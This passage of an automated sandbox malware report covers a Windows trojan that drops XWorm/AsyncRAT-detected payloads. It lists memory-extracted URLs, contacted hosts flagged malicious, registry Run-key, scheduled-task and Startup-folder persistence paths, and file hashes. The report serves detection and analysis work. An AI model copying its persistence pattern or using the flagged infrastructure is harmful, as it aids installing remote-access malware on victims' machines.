                                                                                        http://crl.securetrust.com/STCA.crlCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://wwwsearch.sf.net/):CMaker 2.0.exe, 00000005.00000003.2228708764.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2233681929.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228000312.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235010705.0000022D34E20000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34E1B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232397966.0000022D34E16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://www.accv.es/legislacion_c.htmCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245266079.0000022D352CF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259518979.0000022D352CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://tools.ietf.org/html/rfc6125#section-6.4.3CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://cryptography.io/en/latest/security/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://crl.xrampsecurity.com/XGCA.crl0CMaker 2.0.exe, 00000005.00000003.2225705918.0000022D35166000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2218109441.0000022D35166000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.cert.fnmt.es/dpcs/CMaker 2.0.exe, 00000005.00000003.2227719395.0000022D35311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://google.com/mailCMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://dashboard.botghost.com/api/public/tools/user_lookup/10773009346920490670DCMaker 2.0.exe, 00000005.00000002.2260388566.0000022D35834000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.accv.es00CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245266079.0000022D352CF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259518979.0000022D352CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyCMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmCMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://github.com/pyca/cryptography/issuesCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://readthedocs.org/projects/cryptography/badge/?version=latestCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://foss.heptapod.net/pypy/pypy/-/issues/3539CMaker 2.0.exe, 00000005.00000003.2176043917.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257904597.0000022D34F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236209518.0000022D34CCA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://google.com/CMaker 2.0.exe, 00000005.00000003.2234513191.0000022D34AA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232148885.0000022D34A94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://mahler:8092/site-updates.pyCMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176670133.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229450636.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34D64000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://crl.securetrust.com/SGCA.crlCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://.../back.jpegCMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://github.com/pyca/cryptographyCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://www.python.org/download/releases/2.3/mro/.CMaker 2.0.exe, 00000005.00000002.2256074496.0000022D34600000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168528887.0000022D34B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://cryptography.io/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://httpbin.org/postCMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://crl.d-CMaker 2.0.exe, 00000005.00000002.2259602397.0000022D35306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://github.com/pyca/cryptography/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://github.com/Ousret/charset_normalizerCMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176104183.0000022D3514D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236511528.0000022D35151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
188.114.97.3 | dashboard.botghost.com | European Union | 13335 | CLOUDFLARENETUS | false
147.185.221.21 | subscribe-bond.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539526
Start date and time: 2024-10-22 19:36:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 22
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: aoKTzGQSRP.exe (renamed because the original name is a hash value)
Original Sample Name: 202cb1021a1db9bd59a642ebee781bbafe284faf3fe1ba8e0ed1d89b3878ddbf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@32/116@3/3
EGA Information:
• Successful, ratio: 87.5%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 1.exe, PID 4828 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Report size getting too big, too many NtSetInformationFile calls found
• VT rate limit hit for: aoKTzGQSRP.exe
Time | Type | Description
13:37:18 | API Interceptor | 10x Sleep call for process: powershell.exe modified
13:37:20 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
13:37:20 | API Interceptor | 358222x Sleep call for process: DeadXClient.exe modified
13:37:53 | API Interceptor | 324961x Sleep call for process: winlogon.exe modified
13:37:55 | API Interceptor | 258306x Sleep call for process: lsass.exe modified
13:37:56 | API Interceptor | 4426x Sleep call for process: svchost.exe modified
13:37:58 | API Interceptor | 295024x Sleep call for process: dwm.exe modified
13:38:09 | API Interceptor | 99x Sleep call for process: WMIADAP.exe modified
13:38:13 | API Interceptor | 191x Sleep call for process: dllhost.exe modified
19:37:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Deadsvchost C:\Users\Public\Deadsvchost.exe
19:37:15 | Task Scheduler | Run new task: Deadsvchost path: C:\Users\Public\Deadsvchost.exe
19:37:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Deadsvchost C:\Users\Public\Deadsvchost.exe
19:37:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.204226742169756
Encrypted: false
SSDEEP: 192:0BvdpuBuS/SRh0NxMYaWj8iyU1lxPzuiFRZ24lO8Z:OyBugZNxMYa48iFxPzuiFRY4lO8Z
MD5: 41CD3D8B8E3A6DA04879F2DA1A67B87B
SHA1: 397EF2BD1F826529E6D7C12B1CC2EC77E4CAAE10
SHA-256: CC3D59EEF00B05426D9045BE7595F3A37A55F60D2A51EBCA736D40C723454BC4
SHA-512: 235098B3C4F83DDE1CB6A5136725BF183814FFE6902FA1D574211B76EE1955B90C800EB52A59F24B5398BA2706F0D5DC2E304EBCBFD7090D827FF6897EF297D1
Malicious: false
Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 16 streams, Tue Oct 22 17:37:16 2024, 0x1205a4 type
Category: dropped
Size (bytes): 439820
Entropy (8bit): 3.1179673963433907
Encrypted: false
SSDEEP: 6144:ZD3KttLQrdIDPlDhTEyc6qOBb+3Q58bMuL53+svG7:FqcZWlDmyc6qOByQduZa7
MD5: F93E1285E4E025BF3E9EC9876551E409
SHA1: 40DFA3AE793CCFE2C1DFB7A75451B434DB614F3B
SHA-256: C60244A83127AD6B893B4744D47199B8AFB4A04D145C88201B2A7305F228E4F4
SHA-512: ADA15999B0DBE6F985749FF45D949B6F8F79656EE7677ED425FBA077B0DDDBC696BC99F5254B63245CB7661185D22B6A3DFADFB9F2606C012354D5E697CB4BB1
Malicious: false
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 6738
Entropy (8bit): 3.7205420051588343
Encrypted: false
SSDEEP: 96:RSIU6o7wVetb78ed2IYZunhW0u5aMQUG89bHbWDXBf0J9jm:R6l7wVeJQerYZ+2pDG89b7Wdf0Jpm
MD5: F9C21D8A6178D359F0F18601DEC24CDF
SHA1: 108519022E27BCB5C0DC0B846CD763501B369827
SHA-256: 80948BE366F4A3BBFC7CDE1116B980F86E336F261769D09ECBE45384366882E0
SHA-512: B043100468387DF876F5394D691AFDB46F39069D15ABEF177BBE5106357A80BCDC69C240E1E255606F77D3E31CA639E72066094D854C86D5CF077A1ED125D675
Malicious: false
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4771
Entropy (8bit): 4.45344538444456
Encrypted: false
SSDEEP: 48:cvIwWl8zsVJg771I9SdWpW8VYgYm8M4JC+PFhKyq8ve+3181vwd:uIjfvI7hs7VcJ4W91Kwd
MD5: 479957F8E41A6986DAFAEB4F6C10497C
SHA1: 047500529F1DCDFFF5FE7DAE671F086DA3F063DB
SHA-256: 64AFC4FE95EDD271112E645DB804AD4E867334BF64A817BD430F1F8B94A375B4
SHA-512: 35DB82A1996B9F67B08E4B4E273F00D77741B7BFE591D7B5AEC0EC3A9753BE051B57E355740A5BF45AD1775AA16B0FD0F4C270337C9AAB60D674C7CF1A26DCDF
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 79178
Entropy (8bit): 3.0317011370766695
Encrypted: false
SSDEEP: 1536:aj96yX6YcTi6CNN2amJQgPaOhH13g5O/0/bytgY+vKYCG:aj96yX6YcTi6CNN2amJQgPaOhH13g5Oc
MD5: 9B38365F201838020852611C4A6D0E2F
SHA1: 77BC118B37C70BFDF635673ED4421BEB3D7A6B61
SHA-256: 91FFBC10F1554F000D438087A95C729F938889C18FB41722A0D37DAFE497628B
SHA-512: 9FFE561EFB6F67E405D9D8B83492E0BF541BB0440145A9745DA12C3900787450E048178FCE1EE49B8985B5DAD749E8BBB0BB03B2FE7487CC359ED5D67FE98DFB
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 13340
Entropy (8bit): 2.687252443040872
Encrypted: false
SSDEEP: 96:TiZYWd2GvI5eYxEYtWQ9HGYEZ/Ft8iEHFoSw2RKsIMa6RYMzJofIQ+3:2ZDFFsmMIjMa6RYMzJowQ+3
MD5: 407CE5A3186D7A9ADA8CAE9B544598DA
SHA1: 21BA2EA52BF47E8EAEA58FBEBCC1B7FE4B8E584B
SHA-256: 50845BDE8D5D362664B65877950E6711FBEE2B9DD8C8ED071388E88A826548C2
SHA-512: 1FA9D248D3FB161CF28DE19D11A6DB8268479BE9F94A514625B9C2CB1E46DEC2A7089B7FBE7D9AB79730BF179F5B0DA223D96EA5F51ADEEBADA7B4F38075C914
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\1.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 155136
Entropy (8bit): 7.794589901193739
Encrypted: false
SSDEEP: 3072:9QpsyzjtpfkzW/7F/ix/ApwXnDLn10FbxYSC/B9KIZb29b/HvX:9QpsyzjtpfOW/7FO/AKL10FbmlBoIYRn
MD5: B8479A23C22CF6FC456E197939284069
SHA1: B2D98CC291F16192A46F363D007E012D45C63300
SHA-256: 18294EE5A6383A48D1BCF2703F17D815529DF3A17580E027C3EFEA1800900E8F
SHA-512: 786CD468CE3723516DC869B09E008EC5D35D1F0C1A61E70083A3BE15180866BE637BD7D8665C2F0218C56875A0EE597C277E088F77DD403BDD2182D06BAD3BD4
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:
• Filename: mIURiU8n2P.exe, Detection: malicious
Process: C:\Users\user\AppData\Local\Temp\1.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 43520
Entropy (8bit): 5.571588653306265
Encrypted: false
SSDEEP: 768:8kQn3SBsJVCm+1pout8PKiFF+g9h7ey96FOChJ8gL7Zs6r:83dJYDLqvFn9wy96FOCsg7
MD5: 7DD98FC2976EE270A278E1A9A28EEFAE
SHA1: 0497EE045226B2D310C7678ED055EEEDBC88DC77
SHA-256: 5711B50667B4DE000C8031724427EC6CD00B41B760CA1608421DC47B549E2093
SHA-512: 94CAB0F684F79E7ADB6BEA43A909D9621A2EF6BF223FBF4650B040766E7EDFC95D77F62AA852EFCCB7752442E96182329934EEE58AD4B8F579A75BD8414D984C
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 81%
Joe Sandbox View:
• Filename: mIURiU8n2P.exe, Detection: malicious
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):35840
                                                                                                                                                                                Entropy (8bit):5.5592928582204815
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:uDMfF7zLKYs2Byj54uddqLi9Fk9wWO/hu/222t:ukF7HKYs/1dd9Fk9wWO/4u2i
                                                                                                                                                                                MD5:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                SHA1:DEEEE7D4F336D0BA898B5579720AAF630951A72F
                                                                                                                                                                                SHA-256:4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                                                                                                                                                                                SHA-512:2B21C93EE09865A5C5F365CB945EBC2473A5B8DDCE009302E8F03815D7784AD3A95D615678B3B49E272D235D10C03262F2DDAAEC9DE8A373C0487B7904BD7858
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadXClient.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadXClient.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                 • Filename: mIURiU8n2P.exe, Detection: malicious
                                                                                                                                                                                Process:C:\Users\Public\DeadXClient.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):35840
                                                                                                                                                                                Entropy (8bit):5.5592928582204815
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:uDMfF7zLKYs2Byj54uddqLi9Fk9wWO/hu/222t:ukF7HKYs/1dd9Fk9wWO/4u2i
                                                                                                                                                                                MD5:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                SHA1:DEEEE7D4F336D0BA898B5579720AAF630951A72F
                                                                                                                                                                                SHA-256:4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                                                                                                                                                                                SHA-512:2B21C93EE09865A5C5F365CB945EBC2473A5B8DDCE009302E8F03815D7784AD3A95D615678B3B49E272D235D10C03262F2DDAAEC9DE8A373C0487B7904BD7858
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Deadsvchost.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Deadsvchost.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1.exe
                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1088
